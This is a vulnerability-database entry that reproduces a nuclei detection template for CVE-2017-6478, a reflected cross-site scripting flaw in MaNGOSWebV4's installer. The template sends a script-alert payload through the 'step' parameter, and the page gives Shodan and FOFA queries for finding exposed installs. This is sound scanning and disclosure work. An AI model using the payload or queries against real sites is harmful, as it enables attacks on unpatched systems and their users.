Lucene search
K

MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting

🗓️ 23 Jun 2026 05:08:33Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

MaNGOSWebV4 pre-4.0.8 has a reflected XSS via install/index.php step parameter through a crafted link.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-6478
4 Dec 202521:02
circl
CVE
CVE-2017-6478
5 Mar 201720:00
cve
Cvelist
CVE-2017-6478
5 Mar 201720:00
cvelist
Exploit DB
MaNGOSWebV4 4.0.6 - Reflected XSS
3 Dec 202500:00
exploitdb
EUVD
EUVD-2017-15535
7 Oct 202500:30
euvd
NVD
CVE-2017-6478
5 Mar 201720:59
nvd
OSV
CVE-2017-6478
5 Mar 201720:59
osv
Packet Storm
📄 MaNGOSWebV4 4.0.6 Cross Site Scripting
4 Dec 202500:00
packetstorm
Packet Storm
📄 MaNGOSWeb 4.0.6 Host Header Injection / XML Injection
27 Jan 202600:00
packetstorm
Packet Storm
📄 MaNGOSWeb 4.0.6 SQL Injection
29 Jan 202600:00
packetstorm
Rows per page
id: CVE-2017-6478

info:
  name: MaNGOSWebV4 < 4.0.8 - Cross-Site Scripting
  author: 0xr2r
  severity: medium
  description: |
   paintballrefjosh/MaNGOSWebV4 < 4.0.8 contains a reflected XSS caused by unsanitized input in install/index.php (step parameter), letting attackers execute arbitrary scripts in the victim's browser, exploit requires victim to visit a maliciously crafted URL
  impact: |
   Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
   Update to version 4.0.8 or later.
  reference:
    - https://github.com/paintballrefjosh/MaNGOSWebV4/issues/15
    - https://github.com/paintballrefjosh/MaNGOSWebV4/releases/tag/4.0.8
    - https://www.exploit-db.com/exploits/52457
    - https://nvd.nist.gov/vuln/detail/CVE-2017-6478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-6478
    cwe-id: CWE-79
    epss-score: 0.02574
    epss-percentile: 0.83158
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MaNGOS Web Enhanced V4 Installer"
    fofa-query: body="MaNGOS Web Enhanced V4 Installer"
  tags: cve,cve2017,xss,mangoswebv4,paintballrefjosh

http:
  - method: GET
    path:
      - "{{BaseURL}}/install/index.php?step=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "MaNGOS Web Enhanced V4 Installer"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207bed205843b0f1b3adcdbdbc2cb59de95cf8b2bb4efacc54d43ccafb7e61c3be022100945711f4421b6bc3082b40512b2f8d477f996f63acddae96324bdc67cf5ec6bf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Apr 2026 01:01Current
6.6Medium risk
Vulners AI Score6.6
CVSS 24.3
CVSS 3.16.1
EPSS0.02574
15